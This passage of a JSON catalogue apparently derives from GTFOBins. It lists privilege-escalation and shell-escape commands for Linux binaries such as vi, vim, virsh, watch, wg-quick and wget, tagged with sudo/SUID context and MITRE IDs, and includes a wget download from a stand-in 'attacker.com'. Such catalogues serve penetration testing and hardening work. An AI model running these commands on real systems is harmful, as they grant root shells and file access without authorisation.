context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:1:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:1:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:2:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh | shell'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:2:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh\\ -p | shell'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:2:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh | shell'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:3:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c :terminal /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:3:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':terminal /bin/sh -p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vi:shell:3:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c :terminal /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vigr:inherit:0:sudo","toolId":"gtfo:vigr","toolName":"vigr","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vigr","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vigr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vigr:inherit:0:suid","toolId":"gtfo:vigr","toolName":"vigr","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vigr","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vigr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vim:file-read:0:sudo","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:file-read:0:suid","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:file-read:0:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"vim -c ':redir! >/path/to/output-file | echo \"DATA\" | redir END | q'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:0:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:0:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:0:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"vim -c ':py ...'","description":"This allows to run Python code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:1:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:1:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:1:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"vim -c ':lua ...'","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:2:sudo","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:2:suid","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vim:inherit:2:unprivileged","toolId":"gtfo:vim","toolName":"vim","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"vim","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vim/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["nvim","rvim","view","vimdiff"]},{"id":"gtfo:vipw:inherit:0:sudo","toolId":"gtfo:vipw","toolName":"vipw","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vipw","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vipw/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:vipw:inherit:0:suid","toolId":"gtfo:vipw","toolName":"vipw","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"vipw","description":"Despite requiring superuser privileges to run, the editor is executed as the unprivileged user.","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vipw/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:virsh:command:0:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"cat >/path/to/temp-file.xml <<EOF\n<domain type='kvm'>\n <name>x</name>\n <os>\n <type arch='x86_64'>hvm</type>\n </os>\n <memory unit='KiB'>1</memory>\n <devices>\n <interface type='ethernet'>\n <script path='/path/to/command'/>\n </interface>\n </devices>\n</domain>\nEOF\nvirsh -c qemu:///system create /path/to/temp-file.xml\nvirsh -c qemu:///system destroy x","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:virsh:file-write:0:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\n\ncat >/path/to/temp-file.xml <<EOF\n<volume type='file'>\n <name>y</name>\n <key>/path/to/output-dir/output-file</key>\n <source>\n </source>\n <capacity unit='bytes'>5</capacity>\n <allocation unit='bytes'>4096</allocation>\n <physical unit='bytes'>5</physical>\n <target>\n <path>/path/to/output-dir/output-file</path>\n <format type='raw'/>\n <permissions>\n <mode>0600</mode>\n <owner>0</owner>\n <group>0</group>\n </permissions>\n </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target /path/to/output-dir/\nvirsh -c qemu:///system vol-create --pool x --file /path/to/temp-file.xml\nvirsh -c qemu:///system vol-upload --pool x /path/to/output-dir/output-file /path/to/temp-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:virsh:file-write:0:unprivileged","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\n\ncat >/path/to/temp-file.xml <<EOF\n<volume type='file'>\n <name>y</name>\n <key>/path/to/output-dir/output-file</key>\n <source>\n </source>\n <capacity unit='bytes'>5</capacity>\n <allocation unit='bytes'>4096</allocation>\n <physical unit='bytes'>5</physical>\n <target>\n <path>/path/to/output-dir/output-file</path>\n <format type='raw'/>\n <permissions>\n <mode>0600</mode>\n <owner>0</owner>\n <group>0</group>\n </permissions>\n </target>\n</volume>\nEOF\n\nvirsh -c qemu:///system pool-create-as x dir --target /path/to/output-dir/\nvirsh -c qemu:///system vol-create --pool x --file /path/to/temp-file.xml\nvirsh -c qemu:///system vol-upload --pool x /path/to/output-dir/output-file /path/to/temp-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group. If the target directory doesn't exist, `pool-create-as` must be run with the `--build` option. The destination file ownership and permissions can be set in the XML.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/virsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:virsh:file-write:1:sudo","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"virsh -c qemu:///system pool-create-as x dir --target /path/to/dir/\nvirsh -c qemu:///system vol-download --pool x input-file output-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/virsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:virsh:file-write:1:unprivileged","toolId":"gtfo:virsh","toolName":"virsh","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"virsh -c qemu:///system pool-create-as x dir --target /path/to/dir/\nvirsh -c qemu:///system vol-download --pool x input-file output-file\nvirsh -c qemu:///system pool-destroy x","description":"This requires the user to be in the `libvirt` group.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/virsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:volatility:inherit:0:sudo","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/volatility/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:volatility:inherit:0:suid","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/volatility/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:volatility:inherit:0:unprivileged","toolId":"gtfo:volatility","toolName":"volatility","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"volatility -f /path/to/core-dump volshell\n...","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/volatility/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:w3m:file-read:0:sudo","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/w3m/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:w3m:file-read:0:suid","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/w3m/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:w3m:file-read:0:unprivileged","toolId":"gtfo:w3m","toolName":"w3m","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"w3m -dump /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/w3m/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wall:file-read:0:sudo","toolId":"gtfo:wall","toolName":"wall","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wall --nobanner /path/to/input-file","description":"The textual file is dumped on the current TTY (neither to `stdout` nor to `stderr`).","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wall/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:0:sudo","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -c 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:0:suid","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -p -c 'reset; exec /bin/sh -p 1>&0 2>&0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:0:unprivileged","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"watch -x /bin/sh -c 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:1:sudo","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:1:suid","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:watch:shell:1:unprivileged","toolId":"gtfo:watch","toolName":"watch","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"watch 'reset; exec /bin/sh 1>&0 2>&0'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/watch/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wc:file-read:0:sudo","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wc:file-read:0:suid","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wc:file-read:0:unprivileged","toolId":"gtfo:wc","toolName":"wc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"wc --files0-from /path/to/input-file","description":"The file content is parsed as a sequence of `\\x00` separated paths. On error the file content appears in a message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wc/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wg-quick:shell:0:sudo","toolId":"gtfo:wg-quick","toolName":"wg-quick","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cat >/path/to/temp-file.conf <<EOF\n[Interface]\nPostUp = /bin/sh\nEOF\n\nwg-quick up /path/to/temp-file.conf","description":"Use `wg-quick down /path/to/temp-file.conf` in order to be able to run the shell again.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wg-quick/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:download:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:download:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O 